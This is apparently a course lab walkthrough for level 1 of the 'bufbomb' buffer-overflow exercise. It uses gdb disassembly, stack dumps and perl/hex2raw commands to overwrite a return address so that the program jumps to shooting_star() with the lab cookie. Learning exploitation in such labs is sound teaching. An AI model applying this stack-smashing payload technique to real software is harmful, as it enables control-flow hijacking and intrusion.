Level 1. Shooting Star

8 minute read

Published:

Primary purpose:

We have to give an input such that after program calls function ah_choo() it won’t return to procedure test(), yet calls procedure shooting_star() which has an argument containing our cookie (0x1d9ed824).

So this is the C code for procedure shooting_star().

void shooting_star (int val) {
         if (val == cookie) {
               printf(“OK: You called fizz(0x%x)\n”, val);
               validate(1);
         } else {
               printf(“NO: You called fizz(0x%x)\n”, val);
         }
         exit(0);
}

Next we’ll see what this procedure shooting_star() does by typing this command:

gdb bufbomb
(gdb) disas shooting_star

Will give this result:

Dump of assembler code for function shooting_star:

AddressOperationElements in operation
0x08048b77 <+0>:sub$0x1c, %esp
0x08048b7a <+3>:mov0x20(%esp), %edx
0x08048b7e <+7>:mov0x28(%esp), %eax
0x08048b82 <+11>:cmp0x804d10c, %eax
0x08048b88 <+17>:jne0x8048bcf <shooting_star+88>
0x08048b8a <+19>:cmp$0x59, %dl
0x08048b8d <+22>:jne0x8048bb5 <shooting_star+62>
0x08048b8f <+24>:mov%eax, 0x8(%esp)
0x08048b93 <+28>:movl$0x804a08c, 0x4(%esp)
0x08048b9b <+36>:movl$0x1, (%esp)
0x08048ba2 <+43>:call0x8048900 __printf_chk@plt
0x08048ba7 <+48>:movl$0x1, (%esp)
0x08048bae <+55>:call0x8049171
0x08048bb3 <+60>:jmp0x8048be7 <shooting_star+112>
0x08048bb5 <+62>:mov%eax, 0x8(%esp)
0x08048bb9 <+66>:movl$0x804a0b4, 0x4(%esp)
0x08048bc1 <+74>:movl$0x1, (%esp)
0x08048bc8 <+81>:call0x8048900 __printf_chk@plt
0x08048bcd <+86>:jmp0x8048be7 <shooting_star+112>
0x08048bcf <+88>:mov%eax, 0x8(%esp)
0x08048bd3 <+92>:movl$0x804a0e4, 0x4(%esp)
0x08048bdb <+100>:movl$0x1, (%esp)

-Type < return > to continue, or q < return > to quit-

We can see from the row 0x08048b7a <+3> that register %edx is filled with the contents of stack which is located at %esp+0x20. Then, at row 0x08048b7e <+7> we can see that register %eax is filled with the contents of stack which is located at %esp+0x28. Then, what are the values contained within those 2 blocks of stack? We’ll see them later.

Then we can see from row 0x08048b82 <+11> that the contents of register %eax is compared with the contents of block located at 0x804d10c. So, after register %eax is being filled with the stack’s value located at %esp+0x28, its value is compared with the value of certain memory. The result of comparison must be same so that we can enter the next process. Then, what is the value contained at address 0x804d10c? To find it, we must run the program and break at procedure shooting_star(). We can break at that procedure by changing the return address of ah_choo() into 08048b77. Use this command:

perl -e ‘print “61 “x32, “62 “x20, “77 8b 04 08”’ > hex0
./hex2raw < hex0 > raw0

And type this command:

gdb bufbomb
(gdb) b shooting_star
Breakpoint 1 at 0x8048b77
(gdb) run -u eksperimen < raw0
Userid: eksperimen
Cookie: 0x1d9ed824
Masukkan input:
Breakpoint 1, 0x08048b77 in shooting_star ()

Now we can see the contents of memory address 0x804d10c by typing this command:

(gdb) x/ 0x804d10c
0x804d10c < cookie >: 496949284
(gdb) p/x 496949284
$1 = 0x1d9ed824

We can use command p/x to convert a number into hexadecimal representation.

Evidently, the contents of that memory address is our cookie! This means if we want to proceed to the next Assembly code, the value of register %eax must be same with our cookie (0x1d9ed824).

The problem is, how to change the value of register %eax into our cookie?

Let’s see this assembly code.

AddressOperationElements in operation
0x08048b7a <+3>:mov0x20(%esp), %edx
0x08048b7e <+7>:mov0x28(%esp), %eax

If we want to know the contents of register %edx and %eax, we do need to see the contents of the stack. Use this command (still using GDB):

(gdb) ni
(gdb) x/20x $esp

The contents of stack    
0x5568366c <_reserved+1037932>:0x616161610x626262620x626262620x62626262
0x5568367c <_reserved+1037948>:0x626262620x626262620x08048b770x00000000
0x5568368c <_reserved+1037964>:0xf7fba0000x0000000f0x08048dcd0xf7fbaac0
0x5568369c <_reserved+1037980>:0x0000000a0x0000000f0xf7e127000x55685ff0

From the above stack, we can see that our string input, namely character 61 as much as 32 characters and character 62 as much as 20 characters fill the stack. Also the return address was changed into 0x08048b77 which is the address of shooting_star().

Register %edx is filled with the contents of stack located at %esp+0x20. Now, we see that the contents of stack located at %esp+0x20. The address of register %esp is 0x5568366c. Use this command:

(gdb) x/ 0x5568366c+0x20

The contents of stack    
0x5568368c <_reserved+1037964>:0xf7fba000   
0x556836ac <_reserved+1037996>:0xf7ff05000x556856800x5614541e0x00000003

So the contents of stack located at %esp+0x20 is 0xf7fba000. This value is stored in register %edx.

Now we see the contents of stack located at %esp+0x28 which will be stored in register %eax. Use this command:

(gdb) x/ 0x5568366c+0x28
0x55683694 <_reserved+1037972>: 0x08048dcd

So, the contents of stack located at %esp+0x28 is 0x08048dcd. This value is stored in register %eax.

Ok, now we have already known the position of address whose value will be stored in register %edx and %eax. Things that should be done now is we will give an additional string input so that the contents at the corresponding stack address can be changed according to specification. The specification for register %eax is its value should be changed into our cookie. Then, how about register %edx which will also be compared with $0x59? Let see the code snippet for shooting_star():

AddressOperationElements in operation
0x08048b8a <+19>:cmp$0x59, %dl
0x08048b8d <+22>:jne0x8048bb5 <shooting_star+62>

Wow, we can see that we won’t compare the value of register %edx entirely with $0x59, yet only partition of register %edx which is called as %dl. Then, what is %dl? Take a look at this illustration.

Register

The above illustration explains that the base register such as eax, ebx, ecx, and edx has 2 parts, namely the first part is 16 bit towards MSB (Most Significant Bit) which is marked by white block, and the second part is 16 bit towards LSB (Least Significant Bit) which is marked by grey block. For register eax, the second part is reffered to ax, where ax itself is divided into 2 small parts, namely ah and al which each of them holds 8 bit. From the illustration we can see that al is part of register %eax which contains the right most 8 bit (towards LSB).

In our case that concerns in dl, it means we’re looking for register edx and dl itself refers to the right most contents of register %edx (8 bit).

So, as we’ve already known the contents of register %edx (0xf7fba000), we can conclude that the right most 8 bit is the right most two digits of hexadecimal representation, namely 00. That two digits must be changed into 59. So, the final value of register %edx should be 0xf7fba059.

Ok, let’s start the exploit!

Let’s quit from GDB by typing command q and type this command:

perl -e ‘print “61 “x32, “62 “x20, “77 8b 04 08 “, “63 “x4, “59 “x1, “64 “x3, “65 “x4, “24 d8 9e 1d”’ > hex0
./hex2raw < hex0 > raw0

Then let’s go back into GDB with these commands:

gdb bufbomb
(gdb) b shooting_star
Breakpoint 1 at 0x8048b77
(gdb) run -u eksperimen < raw0
Userid: eksperimen
Cookie: 0x1d9ed824
Masukkan input:
Breakpoint 1, 0x08048b77 in shooting_star ()
(gdb) ni
(gdb) ni
(gdb) ni
(gdb) ni
(gdb) i r

Info registers  
eax0x1d9ed824496949284
ecx0xf7fbb8a4-134498140
edx0x646464591684300889
ebx0x00
esp0x5568366c0x5568366c <_reserved+1037932>
ebp0x55685ff00x55685ff0 <_reserved+1048560>
esi0x33
edi0x00
eip0x8048b880x8048b88 <shooting_star+17>
eflags0x246[ PF ZF IF ]
cs0x2335
ss0x2b43
ds0x2b43
es0x2b43
fs0x00
gs0x6399

Great! As we can see, after we execute the command for filling the register %edx and %eax, the contents of register %eax is our cookie and the dl value of register %edx is 59. Now let’s see the stack’s condition. Use this command:

(gdb) x/20x $esp

The contents of stack    
0x5568366c <_reserved+1037932>:0x616161610x626262620x626262620x62626262
0x5568367c <_reserved+1037948>:0x626262620x626262620x08048b770x63636363
0x5568368c <_reserved+1037964>:0x646464590x656565650x1d9ed8240xf7fbaa00
0x5568369c <_reserved+1037980>:0x0000000a0x0000000f0xf7e127000x55685ff0
0x556836ac <_reserved+1037996>:0xf7ff05000x556856800x7ffa3ea00x00000003

From above stack’s illustration, we can see that the current stack’s condition is suitable with the given input. For the rest, use this command:

(gdb) c
Continuing.
OK: The shooting_star(0x1d9ed824) over there
VALID
Selamat!
[Inferior 1 (process 4639) exited normally]

Yeah! Great works!

Continue to level 2!